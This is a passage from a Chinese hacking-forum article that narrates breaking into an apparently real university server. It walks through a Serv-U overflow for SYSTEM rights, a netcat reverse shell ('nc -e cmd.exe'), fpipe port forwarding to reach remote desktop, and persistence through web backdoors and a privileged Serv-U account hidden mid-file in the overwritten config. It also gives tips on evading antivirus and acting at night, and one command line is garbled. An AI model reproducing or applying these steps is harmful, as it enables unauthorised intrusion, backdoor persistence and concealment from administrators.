管理员权限上传漏洞解析( 二 )


本以为开个3389可以走人了,但是管理员的第四个玩笑可是有意思啊!居然除了80端口外什么端口都连不上,估计有什么我所不明白的软件吧!不过找了半天也不知道那个服务是防火墙 。上次突破一台主机有windows自带防火墙,我直接server-u溢出停掉他了!我有system权限我怕谁?这里你禁止向内连接偶就不信你还能拒绝对外连接 。马上本地监听端口,然后用溢出执行命令nc-ecmd.exeipport,如图六 。不一会果然这里就有cmdshell了,最高权限哦!如图七 。嘿嘿,管理员的防火墙在我们看来不也就是个玩笑了么?如果你想上他的3389的话,可以在夜深人静的时候上传fpipe执行
fpipe-l80-r3389127.0.0.1
【管理员权限上传漏洞解析】不过最好先把他的iis停掉(知道为什么叫你夜深人静的时候动手吧!^_^) 。这样的防火墙就只是个不会看门的玩物了 。
不过,入侵是要留个后门的,方便常回来看看,80端口的web就不要管了,插入的几个海洋服务端估计他是查不出的 。最好不要用灰鸽子之类的东西了,他杀毒软件那么BT,迟早有一天被K,有server-u的话还是建立个后门帐户的比较好点,不会被杀,还实惠 。可是这里我没有直接添加server-u帐户的工具,自己编译代码也不会,不过菜鸟有菜鸟的办法 。将他的serveru配置文件下载下来到本机,做了个备份后,添加特权帐号的过程我就不写了,如图八不过最后我用了fc命令比较那两个文件 。嘿嘿,因为譬如版本号什么的都会自动更改,还有注册码都变成本机的了,本着不要改变主机设置的原则进程id什么的我就不改了 。注意,默认添加的帐号是在文件的最后面,一眼就可以看出来,这里我把他弄到中间去了,这个比较隐蔽 。可是当我添加完成后 。再用木马传到主机上去,因为是c:下面的,所以没有改写的权限 。不过先写个批处理传上去,然后用得到的cmdshell执行 。内容如下
del"C:ProgramFilesServ-UServUAdmin.ini"&〩:z$df#webServUAdmin.iniC:ProgramFilesServ-U
执行后先连接他的21端口发现居然没开,汗!管理员还记得玩这样的把戏!想了一会,还是跑到配置文件的最下面看到
[DOMAINS]
Domain1=202.x.x.x||1221|ftp.xxx.edu.cn|1|0|0
赫然的1221在那里呢!马上连上去,心爱的server-u连接界面跳出来了!激动ing!不只这些,好多朋友在进入主机后都找不到3389之类的端口 。netstat-an看下,运气好的话还能看出来,运气不好的话就……呵呵!不过没有关系,server-u的端口在ini文件里,3389的就在注册表里,拿到权限可以读出来啊!还有,如果有高权限的cmdshell话,直接上传fport全都出来 。呵呵!管理员最后的一个玩笑也被突破,事情搞定 。
其实这些管理员的安全意识也不差,知道设置cmd.exe权限,知道防火墙杀毒软件一起上,知道哪些文件危险,知道屏蔽端口,可是这些对付一些普通的扫描和溢出是可以的,但是对一个方面的重视是不够的,要记得木桶理论,重视web安全,把入侵者挡在系统之外远比设置一些似乎管用的障碍更重要!而对于安全爱好者而言,也要有永不放弃的精神,多动脑筋,不要缺乏想象力什么样的障碍一定可以突破的 。这里是我的一些经验,有什么问题请到非安全论坛讨论 。

推荐阅读